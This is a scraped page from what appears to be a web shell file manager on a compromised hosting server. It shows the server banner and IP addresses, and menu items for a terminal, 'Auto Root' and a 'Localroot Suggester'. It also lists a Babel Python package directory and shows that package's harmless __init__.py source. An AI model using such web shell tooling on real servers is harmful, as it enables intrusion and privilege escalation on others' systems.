Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python2.7 /
site-packages /
babel /
Delete
Unzip
Name
Size
Permission
Date
Action
localedata
[ DIR ]
drwxr-xr-x
2021-09-16 14:49
messages
[ DIR ]
drwxr-xr-x
2021-09-16 14:49
__init__.py
1.3
KB
-rw-r--r--
2011-03-17 10:03
__init__.pyc
1017
B
-rw-r--r--
2014-09-11 12:00
__init__.pyo
1017
B
-rw-r--r--
2014-09-11 12:00
core.py
25.54
KB
-rw-r--r--
2011-03-17 10:03
core.pyc
27.78
KB
-rw-r--r--
2014-09-11 12:00
core.pyo
27.78
KB
-rw-r--r--
2014-09-11 12:00
dates.py
36.16
KB
-rw-r--r--
2011-03-17 10:03
dates.pyc
35.22
KB
-rw-r--r--
2014-09-11 12:00
dates.pyo
35.12
KB
-rw-r--r--
2014-09-11 12:00
global.dat
35.47
KB
-rw-r--r--
2011-03-17 10:10
localedata.py
6.42
KB
-rw-r--r--
2011-03-17 10:03
localedata.pyc
6.81
KB
-rw-r--r--
2014-09-11 12:00
localedata.pyo
6.81
KB
-rw-r--r--
2014-09-11 12:00
numbers.py
18.5
KB
-rw-r--r--
2011-03-17 10:03
numbers.pyc
18.08
KB
-rw-r--r--
2014-09-11 12:00
numbers.pyo
18.08
KB
-rw-r--r--
2014-09-11 12:00
support.py
12.7
KB
-rw-r--r--
2011-03-17 10:03
support.pyc
17.17
KB
-rw-r--r--
2014-09-11 12:00
support.pyo
17.17
KB
-rw-r--r--
2014-09-11 12:00
util.py
10.17
KB
-rw-r--r--
2011-03-17 10:03
util.pyc
13.17
KB
-rw-r--r--
2014-09-11 12:00
util.pyo
13.17
KB
-rw-r--r--
2014-09-11 12:00
Save
Rename
# -*- coding: utf-8 -*- # # Copyright (C) 2007-2008 Edgewall Software # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. The terms # are also available at http://babel.edgewall.org/wiki/License. # # This software consists of voluntary contributions made by many # individuals. For the exact contribution history, see the revision # history and logs, available at http://babel.edgewall.org/log/. """Integrated collection of utilities that assist in internationalizing and localizing applications. This package is basically composed of two major parts: * tools to build and work with ``gettext`` message catalogs * a Python interface to the CLDR (Common Locale Data Repository), providing access to various locale display names, localized number and date formatting, etc. :see: http://www.gnu.org/software/gettext/ :see: http://docs.python.org/lib/module-gettext.html :see: http://www.unicode.org/cldr/ """ from babel.core import * __docformat__ = 'restructuredtext en' try: from pkg_resources import get_distribution, ResolutionError try: __version__ = get_distribution('Babel').version except ResolutionError: __version__ = None # unknown except ImportError: __version__ = None # unknown